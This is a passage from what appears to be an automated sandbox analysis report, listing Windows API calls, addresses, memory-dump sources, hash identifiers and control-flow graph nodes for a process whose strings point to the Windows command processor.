                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F69
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5037
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC504B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50F2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC510F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5130
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC514A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5175
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$P<dwj`$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1049357271-4202835959
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b126f1702366f536cdc0290ce0484146886976d8b64aeb935690e35a9b1b7135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C16C65A08B46D6EA00BB11EC351BBF7A1FF89BA4FC48134D90E473A5DF3CA4468360

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1809961153-366488791
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d28b187de5df886c849393368fe11504ded461ab225ca9f976165d27fccd3d44
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D14E22A0CB8585EA60EB15EC642BBF7A1FF84760F848136DA4E437A4DF3CE546C710

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$P<dwj`$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2622545777-3018353264

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:$P<dwj`
• API String ID: 2364928044-4063957050
• Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction ID: cdef8811c7da3924b11e5a175cac4be91fba1452734177d3531fa0845580e7f0
• Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction Fuzzy Hash: ADC19E61A1C74281FA64BB25DC242BBE2A1FF91F94FE46231DA1E472D5DF7CE8458320

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: memset$DriveErrorInformationLastTypeVolume
• String ID: P<dwj`
• API String ID: 850181435-4006019111
• Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
• Instruction ID: a2dfd22914faaee84c5ebf64896b17a8da57df17c6a2113f2e9396a5a78d2c2f
• Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
• Instruction Fuzzy Hash: D1418F32608BC1CAE7609F20DC542EBB7A4FF89B49F945125DA4D4BB48CF38D546CB10

Control-flow Graph
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4291973834-0

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

control_flow_graph
1224 7ff706ec4a14-7ff706ec4a3e GetEnvironmentStringsW
1225 7ff706ec4a40-7ff706ec4a46
1224->1225
1226 7ff706ec4aae-7ff706ec4ac5
1224->1226
1227 7ff706ec4a59-7ff706ec4a8f GetProcessHeap HeapAlloc
1225->1227
1228 7ff706ec4a48-7ff706ec4a52
1225->1228
1230 7ff706ec4a91-7ff706ec4a9a memmove
1227->1230
1231 7ff706ec4a9f-7ff706ec4aa9 FreeEnvironmentStringsW
1227->1231
1228->1228
1229 7ff706ec4a54-7ff706ec4a57
1228->1229
1229->1227
1229->1228
1230->1231
1231->1226
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254246844-4006019111
APIs
  • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
• SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
• SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
• SetErrorMode.KERNELBASE ref: 00007FF706EC3106
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
APIs
  • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
  • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF706EC5B52
  • Part of subcall function 00007FF706EC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4297
  • Part of subcall function 00007FF706EC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC42D7
  • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC42FD
  • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC4368
  • Part of subcall function 00007FF706EC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4380
  • Part of subcall function 00007FF706EC4224: wcsrchr.MSVCRT ref: 00007FF706EC43E6
  • Part of subcall function 00007FF706EC4224: lstrcmpW.KERNELBASE ref: 00007FF706EC4401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF706EC5BC7
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID: P<dwj`
• API String ID: 497088868-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 338552980-366488791
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c3506a1d8debd3bbd36834f8c7fedff0ccd37dc3184a433ea20917ae1affb06f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
